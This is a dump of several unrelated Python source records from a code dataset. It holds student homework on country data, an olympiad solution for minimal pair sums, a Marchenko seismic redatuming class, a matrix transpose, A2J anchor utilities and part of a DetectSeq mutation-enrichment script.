'aholisi':33000000,\n# 'pul birligi':'som'\n# },\n# 'rossiya':{'poytaht':'moskva','hududi':17098246,\n# 'aholisi':144000000, 'pul birligi':'rubl'\n# },\n# 'aqsh':{'poytaht':'washington d.c','hududi':9631418,\n# 'aholisi':327000000, 'pul birligi':'dollar'\n# },\n# 'malayziya':{'poytaht':'kuala-lumpur','hududi':329750,\n# 'aholisi':25000000, 'pul birligi':'rinngit'\n# }\n# }\n# for ism, info in davlatlar.items():\n# if ism.lower()=='aqsh':\n# ism = ism.upper()\n# else:\n# ism = ism.capitalize()\n# print(f\"\\n{ism}ning poytahti: {info['poytaht'].title()}\" \n# f\"\\nHududi: {info['hududi']} kv.km.\"\n# f\"\\nAholisi: {info['aholisi']}\"\n# f\"\\nPul birligi: {info['pul birligi']}\")\n \n\n# 4 Assignment\n\ndavlatlar = {\n 'ozbekiston':{'poytaht':'toshkent','hududi':448978,\n 'aholisi':33000000,\n 'pul birligi':'som'\n },\n 'rossiya':{'poytaht':'moskva','hududi':17098246,\n 'aholisi':144000000, 'pul birligi':'rubl'\n },\n 'aqsh':{'poytaht':'washington d.c','hududi':9631418,\n 'aholisi':327000000, 'pul birligi':'dollar'\n },\n 'malayziya':{'poytaht':'kuala-lumpur','hududi':329750,\n 'aholisi':25000000, 'pul 
birligi':'rinngit'}\n }\ndavlat = input('Davlat nomini kiriting...>>').lower()\nif davlat in davlatlar:\n info = davlatlar[davlat]\n print(f\"\\n{davlat.capitalize()}ning poytahti: {info['poytaht'].title()}\" \n f\"\\nHududi: {info['hududi']} kv.km.\"\n f\"\\nAholisi: {info['aholisi']}\"\n f\"\\nPul birligi: {info['pul birligi']}\")\nelse:\n print('Kechirasiz bizda bu davlat haqida malumot mavjud emas')\n \n\n\n\n \n \n \n \n \n\n\n\n\n","sub_path":"Lesson-16homework.py","file_name":"Lesson-16homework.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642240063","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\nЗадача C4-98.\r\nРешение на языке Python 3.\r\n-------------------------------------------------\r\n98) (А.А. Богданов – Danov1802 №27-5) На вход \r\nпрограммы поступает последовательность из N целых \r\nположительных чисел. Рассматриваются все пары \r\nразличных элементов последовательности (элементы \r\nпары не обязаны стоять в последовательности рядом, \r\nпорядок элементов в паре неважен). Необходимо \r\nопределить минимальную сумму произвольной пары чисел \r\nи количество пар с суммой равной минимальной. \r\nОписание входных и выходных данных\r\nВ первой строке входных данных задаётся количество \r\nчисел N (1 ≤ N ≤ 10000). В каждой из последующих N \r\nстрок записано одно натуральное число, не превышающее \r\n10000. В качестве результата программа должна вывести \r\nдва числа: найденную минимальную сумму и количество \r\nпар с суммой равной минимальной.\r\nПример входных данных №1: \r\n10 \r\n1 2 3 1 2 3 1 2 3 1\r\nВыходные данных для приведенного выше примера: 2 6\r\nПример входных данных №2: \r\n5 \r\n2 2 1 2 2\r\nВыходные данных для приведенного выше примера: 3 4\r\n\"\"\"\r\n# import sys\r\n# save_stdin = sys.stdin\r\n# sys.stdin = open(\"in/98.in\")\r\n\r\nn = int( input() )\r\nm1 = m2 = 10001\r\nk1 = 0\r\n\r\nfor i in range(n):\r\n a = int( input() )\r\n if a < m1:\r\n m2 = m1\r\n k2 = k1\r\n m1 = a\r\n k1 = 0\r\n elif a < m2:\r\n m2 = a\r\n k2 = 0 \r\n if a == m1:\r\n k1 += 1 \r\n if a == m2: \r\n k2 += 1\r\n\r\nif m1 == m2:\r\n k = k1*(k1-1) // 2\r\nelse: \r\n k = k2\r\n \r\nprint( m1+m2, k ) \r\n\r\n# sys.stdin = save_stdin","sub_path":"Sol/98.py","file_name":"98.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"276870987","text":"import logging\nimport numpy as np\n\nfrom scipy.signal import filtfilt\nfrom scipy.sparse.linalg import lsqr\nfrom scipy.special import hankel2\nfrom pylops.utils import dottest as Dottest\nfrom pylops import Diagonal, Identity, Block, BlockDiag\nfrom mdc_old import MDC\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.WARNING)\n\ndef directwave(wav, trav, nt, dt, nfft=None):\n r\"\"\"Analytical direct wave\n\n Compute analytical 2d Green's function in frequency domain given\n a traveltime curve ``trav`` and wavelet ``wav``.\n\n Parameters\n ----------\n wav : :obj:`numpy.ndarray`\n Wavelet in time domain to apply to direct arrival when created\n using ``trav``. 
Phase will be discarded resulting in a zero-phase\n wavelet with same amplitude spectrum as provided by ``wav``\n trav : :obj:`numpy.ndarray`\n Traveltime of first arrival from subsurface point to\n surface receivers of size :math:`\\lbrack nr \\times 1 \\rbrack`\n nt : :obj:`float`, optional\n Number of samples in time\n dt : :obj:`float`, optional\n Sampling in time\n nfft : :obj:`int`, optional\n Number of samples in fft time (if ``None``, :math:`nfft=nt`)\n\n Returns\n -------\n direct : :obj:`numpy.ndarray`\n Direct arrival in time domain of size\n :math:`\\lbrack nt \\times nr \\rbrack`\n\n \"\"\"\n nr = len(trav)\n nfft = nt if nfft is None or nfft < nt else nfft\n W = np.abs(np.fft.rfft(wav, nfft)) * dt\n f = 2 * np.pi * np.arange(nfft) / (dt * nfft)\n\n direct = np.zeros((nfft, nr), dtype=np.complex128)\n for it in range(len(W)):\n #direct[it] = W[it] * 1j * f[it] * np.exp(-1j * ((f[it] * trav) \\\n # + np.sign(f[it]) * np.pi / 4)) / \\\n # np.sqrt(8 * np.pi * np.abs(f[it]) * trav + 1e-10)\n direct[it] = W[it] * 1j * f[it] * (-1j) * \\\n hankel2(0, f[it] * trav + 1e-10) / 4\n\n direct = np.fft.irfft(direct, nfft, axis=0) / dt\n direct = np.real(direct[:nt])\n return direct\n\n\nclass Marchenko():\n r\"\"\"Marchenko redatuming\n\n Solve multi-dimensional Marchenko redatuming problem using\n :py:func:`scipy.sparse.linalg.lsqr` iterative solver.\n\n Parameters\n ----------\n R : :obj:`numpy.ndarray`\n Multi-dimensional reflection response in time or frequency\n domain of size :math:`[n_s \\times n_r \\times n_t/n_{fmax}]`\n R1 : :obj:`bool`, optional\n Complex conjugate multi-dimensional reflection response\n in frequency domain (if ``None``, ``R`` must be in time)\n dt : :obj:`float`, optional\n Sampling of time integration axis\n nt : :obj:`float`, optional\n Number of samples in time (not required if ``R`` is in time)\n dr : :obj:`float`, optional\n Sampling of receiver integration axis\n nfmax : :obj:`int`, optional\n Index of max frequency to include in deconvolution process\n wav : :obj:`numpy.ndarray`, optional\n Wavelet to apply to direct arrival when created using ``trav``\n toff : :obj:`float`, optional\n Time-offset to apply to traveltime\n nsmooth : :obj:`int`, optional\n Number of samples of smoothing operator to apply to window\n dtype : :obj:`bool`, optional\n Type of elements in input array.\n\n Attributes\n ----------\n ns : :obj:`int`\n Number of samples along source axis\n nr : :obj:`int`\n Number of samples along receiver axis\n shape : :obj:`tuple`\n Operator shape\n explicit : :obj:`bool`\n Operator contains a matrix that can be solved explicitly\n (True) or not (False)\n\n Raises\n ------\n TypeError\n If ``t`` is not :obj:`numpy.ndarray`.\n\n See Also\n --------\n MDC : Multi-dimensional convolution\n MDD : Multi-dimensional deconvolution\n\n Notes\n -----\n Marchenko redatuming is a method that allows to produce correct\n subsurface-to-surface responses given the availability of a\n reflection data and a macro-velocity model [1]_.\n\n The Marchenko equations can be written in a compact matrix\n form [2]_ and solved by means of iterative solvers such as LSQR:\n\n .. 
math::\n \\begin{bmatrix}\n \\Theta \\mathbf{R} \\mathbf{f_d^+} \\\\\n \\mathbf{0}\n \\end{bmatrix} =\n \\mathbf{I} -\n \\begin{bmatrix}\n \\mathbf{0} & \\Theta \\mathbf{R} \\\\\n \\Theta \\mathbf{R^*} & \\mathbf{0}\n \\end{bmatrix}\n \\begin{bmatrix}\n \\mathbf{f^-} \\\\\n \\mathbf{f_m^+}\n \\end{bmatrix}\n\n Finally the subsurface Green's functions can be obtained applying the\n following operator to the retrieved focusing functions\n\n .. math::\n \\begin{bmatrix}\n -\\mathbf{g^-} \\\\\n \\mathbf{g^{+ *}}\n \\end{bmatrix} =\n \\mathbf{I} -\n \\begin{bmatrix}\n \\mathbf{0} & \\mathbf{R} \\\\\n \\mathbf{R^*} & \\mathbf{0}\n \\end{bmatrix}\n \\begin{bmatrix}\n \\mathbf{f^-} \\\\\n \\mathbf{f^+}\n \\end{bmatrix}\n\n .. [1] Wapenaar, K., Thorbecke, J., Van der Neut, J., Broggini, F.,\n Slob, E., and Snieder, R., \"Marchenko imaging\", Geophysics, vol. 79,\n pp. WA39-WA57. 2014.\n\n .. [2] van der Neut, J., Vasconcelos, I., and Wapenaar, K. \"On Green's\n function retrieval by iterative substitution of the coupled\n Marchenko equations\", Geophysical Journal International, vol. 203,\n pp. 792-813. 2015.\n\n \"\"\"\n def __init__(self, R, R1=None, dt=0.004, nt=None, dr=1.,\n nfmax=None, wav=None, toff=0.0, nsmooth=10,\n dtype='float64'):\n # Save inputs into class\n self.dt = dt\n self.dr = dr\n self.wav = wav\n self.toff = toff\n self.nsmooth = nsmooth\n self.dtype = dtype\n self.explicit = False\n\n # Infer dimensions of R\n if R1 is None:\n self.ns, self.nr, self.nt = R.shape\n self.nfmax = nfmax\n else:\n self.ns, self.nr, self.nfmax = R.shape\n self.nt = nt\n if nt is None:\n logging.error('nt must be provided as R is in frequency')\n self.nt2 = int(2*self.nt-1)\n self.t = np.arange(self.nt)*self.dt\n\n # Fix nfmax to be at maximum equal to half of the size of fft samples\n if self.nfmax is None or self.nfmax > np.ceil((self.nt2 + 1) / 2):\n self.nfmax = int(np.ceil((self.nt2+1)/2))\n logging.warning('nfmax set equal to (nt+1)/2=%d', self.nfmax)\n\n # Add negative time to reflection data and convert to frequency\n if R1 is None:\n Rtwosided = np.concatenate((np.zeros((self.ns, self.nr,\n self.nt - 1)), R), axis=-1)\n R1twosided = np.concatenate((np.flip(R, axis=-1),\n np.zeros((self.ns, self.nr,\n self.nt - 1))), axis=-1)\n\n Rtwosided_fft = np.fft.rfft(Rtwosided, self.nt2,\n axis=-1) / np.sqrt(self.nt2)\n self.Rtwosided_fft = Rtwosided_fft[..., :nfmax]\n R1twosided_fft = np.fft.rfft(R1twosided, self.nt2,\n axis=-1) / np.sqrt(self.nt2)\n self.R1twosided_fft = R1twosided_fft[..., :nfmax]\n else:\n self.Rtwosided_fft = R\n self.R1twosided_fft = R1\n\n\n def apply_onepoint(self, trav, G0=None, nfft=None, rtm=False, greens=False,\n dottest=False, fast=True, **kwargs_lsqr):\n r\"\"\"Marchenko redatuming for one point\n\n Solve the Marchenko redatuming inverse problem for a single point\n given its direct arrival traveltime curve (``trav``)\n and waveform (``G0``).\n\n Parameters\n ----------\n trav : :obj:`numpy.ndarray`\n Traveltime of first arrival from subsurface point to\n surface receivers of size :math:`[n_r \\times 1]`\n G0 : :obj:`numpy.ndarray`, optional\n Direct arrival in time domain of size :math:`[n_r \\times n_t]`\n (if None, create arrival using ``trav``)\n nfft : :obj:`int`, optional\n Number of samples in fft when creating the analytical direct wave\n rtm : :obj:`bool`, optional\n Compute and return rtm redatuming\n greens : :obj:`bool`, optional\n Compute and return Green's functions\n dottest : :obj:`bool`, optional\n Apply dot-test\n fast : :obj:`bool`\n Fast application of 
MDC when model has only one virtual source\n (``True``) or not (``False``)\n **kwargs_lsqr\n Arbitrary keyword arguments for\n :py:func:`scipy.sparse.linalg.lsqr` solver\n\n Returns\n ----------\n f1_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing focusing function of size :math:`[n_r \\times n_t]`\n f1_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing focusing function\n of size :math:`[n_r \\times n_t]`\n p0_minus : :obj:`numpy.ndarray`\n Single-scattering standard redatuming upgoing Green's function of\n size :math:`[n_r \\times n_t]`\n g_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing Green's function of size :math:`[n_r \\times n_t]`\n g_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing Green's function\n of size :math:`[n_r \\times n_t]`\n\n \"\"\"\n # Create window\n trav_off = trav - self.toff\n trav_off = np.round(trav_off / self.dt).astype(np.int)\n\n # window\n w = np.zeros((self.nr, self.nt))\n for ir in range(self.nr):\n w[ir, :trav_off[ir]] = 1\n w = np.hstack((np.fliplr(w), w[:, 1:]))\n if self.nsmooth > 0:\n smooth = np.ones(self.nsmooth) / self.nsmooth\n w = filtfilt(smooth, 1, w)\n\n # Create operators\n Rop = MDC(self.Rtwosided_fft, self.nt2, nv=1, dt=self.dt, dr=self.dr,\n twosided=True, fast=fast, dtype=self.dtype)\n R1op = MDC(self.R1twosided_fft, self.nt2, nv=1, dt=self.dt, dr=self.dr,\n twosided=True, fast=fast, dtype=self.dtype)\n Wop = Diagonal(w.flatten())\n Iop = Identity(self.nr * (2*self.nt-1))\n Mop = Block([[Iop, -1 * Wop * Rop],\n [-1 * Wop * R1op, Iop]]) * BlockDiag([Wop, Wop])\n Gop = Block([[Iop, -1 * Rop],\n [-1 * R1op, Iop]])\n\n if dottest:\n Dottest(Gop, 2 * self.nr * self.nt2,\n 2 * self.nr * self.nt2,\n raiseerror=True, verb=True)\n if dottest:\n Dottest(Mop, 2 * self.nr * self.nt2,\n 2 * self.nr * self.nt2,\n raiseerror=True, verb=True)\n\n # Create input focusing function\n if G0 is None:\n if self.wav is not None and nfft is not None:\n G0 = (directwave(self.wav, trav, self.nt,\n self.dt, nfft=nfft)).T\n else:\n logging.error('wav and/or nfft are not provided. '\n 'Provide either G0 or wav and nfft...')\n raise ValueError('wav and/or nfft are not provided. 
'\n 'Provide either G0 or wav and nfft...')\n\n fd_plus = np.concatenate((np.fliplr(G0),\n np.zeros((self.nr, self.nt - 1))), axis=-1)\n\n # Run standard redatuming as benchmark\n if rtm:\n p0_minus = Rop * fd_plus.flatten()\n p0_minus = p0_minus.reshape(self.nr, self.nt2)\n\n # Create data and inverse focusing functions\n d = Wop * Rop * fd_plus.flatten()\n d = np.concatenate((d.reshape(self.nr, self.nt2),\n np.zeros((self.nr, self.nt2))))\n\n # Invert for focusing functions\n f1_inv = lsqr(Mop, d.flatten(), **kwargs_lsqr)[0]\n f1_inv = f1_inv.reshape(2 * self.nr, self.nt2)\n f1_inv_tot = f1_inv + np.concatenate((np.zeros((self.nr, self.nt2)),\n fd_plus))\n f1_inv_minus, f1_inv_plus = f1_inv_tot[:self.nr], f1_inv_tot[self.nr:]\n\n if greens:\n # Create Green's functions\n g_inv = Gop * f1_inv_tot.flatten()\n g_inv = np.real(g_inv) # cast to real as Gop is a complex operator\n g_inv = g_inv.reshape(2 * self.nr, (2 * self.nt - 1))\n g_inv_minus, g_inv_plus = -g_inv[:self.nr], \\\n np.fliplr(g_inv[self.nr:])\n\n if rtm and greens:\n return f1_inv_minus, f1_inv_plus, p0_minus, g_inv_minus, g_inv_plus\n elif rtm:\n return f1_inv_minus, f1_inv_plus, p0_minus\n elif greens:\n return f1_inv_minus, f1_inv_plus, g_inv_minus, g_inv_plus\n else:\n return f1_inv_minus, f1_inv_plus\n\n\n def apply_multiplepoints(self, trav, G0=None, nfft=None,\n rtm=False, greens=False,\n dottest=False, **kwargs_lsqr):\n r\"\"\"Marchenko redatuming for multiple points\n\n Solve the Marchenko redatuming inverse problem for multiple\n points given their direct arrival traveltime curves (``trav``)\n and waveforms (``G0``).\n\n Parameters\n ----------\n trav : :obj:`numpy.ndarray`\n Traveltime of first arrival from subsurface points to\n surface receivers of size :math:`[n_r \\times n_{vs}]`\n G0 : :obj:`numpy.ndarray`, optional\n Direct arrival in time domain of size\n :math:`[n_r \\times n_{vs} \\times n_t]` (if None, create arrival\n using ``trav``)\n nfft : :obj:`int`, optional\n Number of samples in fft when creating the analytical direct wave\n rtm : :obj:`bool`, optional\n Compute and return rtm redatuming\n greens : :obj:`bool`, optional\n Compute and return Green's functions\n dottest : :obj:`bool`, optional\n Apply dot-test\n **kwargs_lsqr\n Arbitrary keyword arguments\n for :py:func:`scipy.sparse.linalg.lsqr` solver\n\n Returns\n ----------\n f1_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing focusing function of size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n f1_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing focusing functionof size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n p0_minus : :obj:`numpy.ndarray`\n Single-scattering standard redatuming upgoing Green's function\n of size :math:`[n_r \\times n_{vs} \\times n_t]`\n g_inv_minus : :obj:`numpy.ndarray`\n Inverted upgoing Green's function of size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n g_inv_plus : :obj:`numpy.ndarray`\n Inverted downgoing Green's function of size\n :math:`[n_r \\times n_{vs} \\times n_t]`\n\n \"\"\"\n nvs = trav.shape[1]\n # Create window\n trav_off = trav - self.toff\n trav_off = np.round(trav_off / self.dt).astype(np.int)\n\n w = np.zeros((self.nr, nvs, self.nt))\n for ir in range(self.nr):\n for ivs in range(nvs):\n w[ir, ivs, :trav_off[ir, ivs]] = 1\n w = np.concatenate((np.flip(w, axis=-1), w[:, :, 1:]), axis=-1)\n if self.nsmooth > 0:\n smooth = np.ones(self.nsmooth) / self.nsmooth\n w = filtfilt(smooth, 1, w)\n\n # Create operators\n Rop = MDC(self.Rtwosided_fft, self.nt2, nv=nvs,\n dt=self.dt, dr=self.dr, 
twosided=True, dtype=self.dtype)\n R1op = MDC(self.R1twosided_fft, self.nt2, nv=nvs,\n dt=self.dt, dr=self.dr, twosided=True, dtype=self.dtype)\n Wop = Diagonal(w.flatten())\n Iop = Identity(self.nr * nvs * (2*self.nt-1))\n Mop = Block([[Iop, -1 * Wop * Rop],\n [-1 * Wop * R1op, Iop]]) * BlockDiag([Wop, Wop])\n Gop = Block([[Iop, -1 * Rop],\n [-1 * R1op, Iop]])\n\n if dottest:\n Dottest(Gop, 2 * self.nr * nvs * self.nt2,\n 2 * self.nr * nvs * self.nt2,\n raiseerror=True, verb=True)\n if dottest:\n Dottest(Mop, 2 * self.nr * nvs * self.nt2,\n 2 * self.nr * nvs * self.nt2,\n raiseerror=True, verb=True)\n\n # Create input focusing function\n if G0 is None:\n if self.wav is not None and nfft is not None:\n G0 = np.zeros((self.nr, nvs, self.nt))\n for ivs in range(nvs):\n G0[:, ivs] = (directwave(self.wav, trav[:, ivs],\n self.nt, self.dt, nfft=nfft)).T\n else:\n logging.error('wav and/or nfft are not provided. '\n 'Provide either G0 or wav and nfft...')\n raise ValueError('wav and/or nfft are not provided. '\n 'Provide either G0 or wav and nfft...')\n\n fd_plus = np.concatenate((np.flip(G0, axis=-1),\n np.zeros((self.nr, nvs,\n self.nt - 1))), axis=-1)\n\n # Run standard redatuming as benchmark\n if rtm:\n p0_minus = Rop * fd_plus.flatten()\n p0_minus = p0_minus.reshape(self.nr, nvs, self.nt2)\n\n # Create data and inverse focusing functions\n d = Wop * Rop * fd_plus.flatten()\n d = np.concatenate((d.reshape(self.nr, nvs, self.nt2),\n np.zeros((self.nr, nvs, self.nt2))))\n\n # Invert for focusing functions\n f1_inv = lsqr(Mop, d.flatten(), **kwargs_lsqr)[0]\n f1_inv = f1_inv.reshape(2 * self.nr, nvs, self.nt2)\n f1_inv_tot = f1_inv + np.concatenate((np.zeros((self.nr, nvs,\n 2 * self.nt - 1)),\n fd_plus))\n f1_inv_minus, f1_inv_plus = f1_inv_tot[:self.nr], f1_inv_tot[self.nr:]\n\n if greens:\n # Create Green's functions\n g_inv = Gop * f1_inv_tot.flatten()\n g_inv = np.real(g_inv) # cast to real as Gop is a complex operator\n g_inv = g_inv.reshape(2 * self.nr, nvs, (2 * self.nt - 1))\n g_inv_minus, g_inv_plus = -g_inv[:self.nr], \\\n np.flip(g_inv[self.nr:], axis=-1)\n\n if rtm and greens:\n return f1_inv_minus, f1_inv_plus, p0_minus, g_inv_minus, g_inv_plus\n elif rtm:\n return f1_inv_minus, f1_inv_plus, p0_minus\n elif greens:\n return f1_inv_minus, f1_inv_plus, g_inv_minus, g_inv_plus\n else:\n return f1_inv_minus, f1_inv_plus\n","sub_path":"developement/marchenko_old.py","file_name":"marchenko_old.py","file_ext":"py","file_size_in_byte":18916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603177056","text":"# Write your solution for 1.1 here!\ns=0\nfor i in range(101):\n\ts=s+i\nprint(s)\n\ns2=0\nfor j in range(0,101,2):\n\ts2=s2+j\nprint(s2)\n","sub_path":"exercises/for_loops.py","file_name":"for_loops.py","file_ext":"py","file_size_in_byte":127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46909220","text":"\"\"\"\nGiven a matrix A, return the transpose of A.\n\nThe transpose of a matrix is the matrix flipped over it's main diagonal,\nswitching the row and column indices of the matrix.\n\"\"\"\nclass Solution(object):\n def transpose(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n m = len(A)\n n = len(A[0])\n B = [[0 for _ in range(m)] for _ in range(n)]\n\n for i in range(n):\n for j in range(m):\n if i == j:\n B[i][j] = A[i][j]\n else:\n B[i][j] = A[j][i]\n\n return B\n\n def transpose2(self, A):\n return zip(*A)\n\n\nA = 
[[1,2,3],[4,5,6],[7,8,9]]\nprint(Solution().transpose(A))","sub_path":"867TranspMat.py","file_name":"867TranspMat.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"433009354","text":"\nimport os\nimport sys\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# PROJ ROOT DIR\nDIR_PATH = os.path.dirname(os.path.abspath(__file__)) # a2j_utilities\nA2J_PATH = os.path.join(DIR_PATH, os.path.pardir) # A2J\nMODEL_PATH = os.path.join(A2J_PATH, os.path.pardir) # model\nROOT_PATH = os.path.join(MODEL_PATH, os.path.pardir) # root\nsys.path.append(ROOT_PATH)\n\n# Import Project Libraries\nimport pipeline.constants as const\n\n\n\ndef generate_anchors(p_h=None, p_w=None):\n    \"\"\"\n    Generate anchor shape\n\n    :param p_h: anchor height layout\n    :param p_w: anchor width layout\n    \"\"\"\n    if p_h is None:\n        p_h = np.array([2, 6, 10, 14])\n    \n    if p_w is None:\n        p_w = np.array([2, 6, 10, 14])\n    \n    num_anchors = len(p_h) * len(p_w)\n\n    # Initialize the anchor points\n    # (the outer loop ranges over p_h and the inner one over p_w, so the two\n    # layouts may have different lengths)\n    k = 0\n    anchors = np.zeros((num_anchors, 2))\n    for i in range(len(p_h)):\n        for j in range(len(p_w)):\n            anchors[k,0] = p_h[i]\n            anchors[k,1] = p_w[j]\n            k += 1\n    return anchors\n\ndef shift(shape, stride, anchor):\n    \"\"\"\n    Create the locations of all the anchors in the input image\n\n    :param shape: common trunk (H, W)\n    :param stride: the downsampling factor from input to common trunk\n    :param anchor: anchor \n    \"\"\"\n    shift_h = np.arange(0, shape[0]) * stride # (shape[0]) 10\n    shift_w = np.arange(0, shape[1]) * stride # (shape[1]) 9\n\n    shift_h, shift_w = np.meshgrid(shift_h, shift_w) # (shape[1], shape[0]) (9, 10), (shape[1], shape[0]) (9, 10)\n    shifts = np.vstack( (shift_h.ravel(), shift_w.ravel()) ).transpose() # (shape[0]*shape[1], 2) (90, 2)\n\n    A = anchor.shape[0] # 16\n    K = shifts.shape[0] # (shape[0]*shape[1]) (90)\n\n    all_anchors = (anchor.reshape(1,A,2) + shifts.reshape((1, K, 2)).transpose((1, 0, 2))) # (shape[0]*shape[1], A, 2)\n    all_anchors = all_anchors.reshape((K*A, 2)) # (shape[0]*shape[1]*A, 2)\n    return all_anchors\n","sub_path":"model/A2J/a2j_utilities/a2j_utils.py","file_name":"a2j_utils.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"281658447","text":"#! /Users/meng/menghw_HD/anaconda2/bin/python\n# #! /gpfs/user/menghaowei/anaconda2/bin/python\n# _*_ coding: UTF-8 _*_\n\n# Version information START --------------------------------------------------\nVERSION_INFO = \\\n\"\"\"\nAuthor: MENG Howard\n\nVersion-01:\n    2019-12-30\n        Input ctrl json and treat json respectively\n\n    2019-12-29\n        Fix output part\n\n    2019-12-28\n        Find significant mpmat signal\n\nE-Mail: meng_howard@126.com\n\"\"\"\n# Version information END ----------------------------------------------------\n\n\n# Learning Part START --------------------------------------------------------\nLEARNING_PART = \\\n\"\"\"\n\nDesign pipeline:\n\nInput:\n    1. ctrl_BAM treat_BAM\n    2. efficient genome size \n    3. mpmat region \n    4. reference\n    5. mut_type_list\n    6. mut_num_cutoff\n\nOutput:\n    1. scale factor on each chromosome\n    2. region raw mutant reads \n    3. region raw non-mutant reads \n    4. region fix mutant reads \n    5. region fix non-mutant reads\n    6. log2FoldChange \n    7. pvalue \n    8. 
qvalue \n\n\"\"\"\n# Learning Part END-----------------------------------------------------------\n\n\nimport argparse\nimport os\nimport sys\n\nimport random\nimport string\nimport time\nimport json\n\nimport pysam \nfrom Bio import SeqIO\n\nfrom scipy import stats\nimport statsmodels.stats.multitest as multi\nimport numpy as np\nimport math\n\nfrom DetectSeqLib.FindMutRegion import *\n\n###############################################################################\n# function part \n###############################################################################\ndef _count_dict_sum_up(count_dict, key_ref_name_list=\"All\", ignore_key_list = [\"total\"]):\n \"\"\"\n INPUT \n \n key = chr1, chr2, chr3 ...\n value = dict and key is \n \n non_mut_align_count\n all_align_count\n total_high_mismatch_count\n query_high_mismatch_count\n mut_align_count\n other_high_mismatch_coun\n all_filter_count\n \n \n use those key to sum up and count \n \n \n ignore \n \n RETURN \n Dict like and add 'total' key\n \"\"\"\n \n if key_ref_name_list == \"All\":\n key_ref_name_list = count_dict.keys()\n \n total_dict = {}\n inner_key_list = count_dict[key_ref_name_list[0]].keys()\n\n for inner_key in inner_key_list:\n total_dict[inner_key] = 0\n\n for ref_key in key_ref_name_list:\n if ref_key not in ignore_key_list:\n for ref_inner_key in inner_key_list:\n total_dict[ref_inner_key] += count_dict[ref_key][ref_inner_key]\n \n count_dict[\"total\"] = total_dict.copy()\n \n return(count_dict)\n\n\ndef _calculate_scale_dict(meta_data_dict, to_large_state = False, scale_reads_count=None):\n \"\"\"\n INPUT:\n \n A dict generated from raw BAM file, and data structure like\n meta_count_dict = {\n \"meta_data\" : {\n \"create_date\" : ,\n \"ctrl_BAM\" : ,\n \"treat_BAM\" : ,\n \"reference\" : ,\n \"threads\" : ,\n \"query_mutation_type\" : ,\n \"query_mutation_min_cutoff\" : ,\n \"query_mutation_max_cutoff\" : ,\n \"other_mismatch_max_cutoff\" : ,\n \"total_mismatch_max_cutoff\" : ,\n \"filter_log\" : \n },\n \"ctrl\" : ,\n \"treat\" : ,\n }\n \n \n Default is False\n Means scale the larger sample up to the smaller sample. 
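For example, with 80e6 aligned ctrl reads and 100e6 aligned treat reads and to_large_state=False, the common scale value is min(80e6, 100e6) = 80e6, so the scale factors are 80e6/80e6 = 1.0 (ctrl) and 100e6/80e6 = 1.25 (treat); dividing each count by its factor scales the treat sample down to the ctrl level.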
\n Usually, scaling down will bring down background noise, which is good for enrichment detection.\n \n RETURN:\n \n \n \n INFO:\n Final changes, 2019-12-29\n \"\"\"\n \n # set dict\n scale_dict = {\"ctrl\" : {}, \"treat\" : {}}\n \n select_key_list = [\n \"all_align_count\",\n \"mut_align_count\",\n \"non_mut_align_count\"\n ]\n \n if scale_reads_count != None:\n ctrl_total_scale = (meta_data_dict[\"ctrl\"][\"total\"][\"all_align_count\"]) / 1.0 / int(scale_reads_count) \n treat_total_scale = (meta_data_dict[\"treat\"][\"total\"][\"all_align_count\"]) / 1.0 / int(scale_reads_count) \n \n for ref_name in meta_data_dict[\"ctrl\"].keys():\n # make dict \n if scale_dict[\"ctrl\"].get(ref_name) == None:\n scale_dict[\"ctrl\"][ref_name] = {}\n\n if scale_dict[\"treat\"].get(ref_name) == None:\n scale_dict[\"treat\"][ref_name] = {}\n \n for key in meta_data_dict[\"ctrl\"][ref_name].keys():\n ctrl_count = meta_data_dict[\"ctrl\"][ref_name][key]\n treat_count = meta_data_dict[\"treat\"][ref_name][key]\n \n if scale_reads_count == None:\n if to_large_state:\n scale_value = max(ctrl_count, treat_count)\n else:\n scale_value = min(ctrl_count, treat_count)\n\n if scale_value == 0:\n ctrl_scale_factor = None\n treat_scale_factor = None\n else:\n ctrl_scale_factor = ctrl_count / 1.0 / scale_value\n treat_scale_factor = treat_count / 1.0 / scale_value\n else:\n ctrl_scale_factor = ctrl_total_scale\n treat_scale_factor = treat_total_scale\n \n # make new dict key\n if key in select_key_list:\n scale_dict_key = key + \".scale_factor\"\n scale_dict[\"ctrl\"][ref_name][scale_dict_key] = ctrl_scale_factor\n scale_dict[\"treat\"][ref_name][scale_dict_key] = treat_scale_factor\n\n # return part \n return scale_dict\n \n\n###############################################################################\n# read parameters\n###############################################################################\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description=\"A tool to find significant enrichment mpmat region\")\n\n parser.add_argument(\"-i\", \"--mpmat_table\",\n help=\".mpmat table, which can be generated from code\",required=True)\n\n parser.add_argument(\"-c\", \"--ctrl_BAM\",\n help=\"Control BAM file\",required=True)\n\n parser.add_argument(\"-t\", \"--treat_BAM\",\n help=\"Treatment BAM file\",required=True)\n\n parser.add_argument(\"-r\", \"--reference\",\n help=\"Genome FASTA file\",required=True)\n\n parser.add_argument(\"-g\", \"--genome_effective_json\",\n help=\"Genome effective sequence information in .json format, can be generated from script \",required=True)\n\n parser.add_argument(\"-m\", 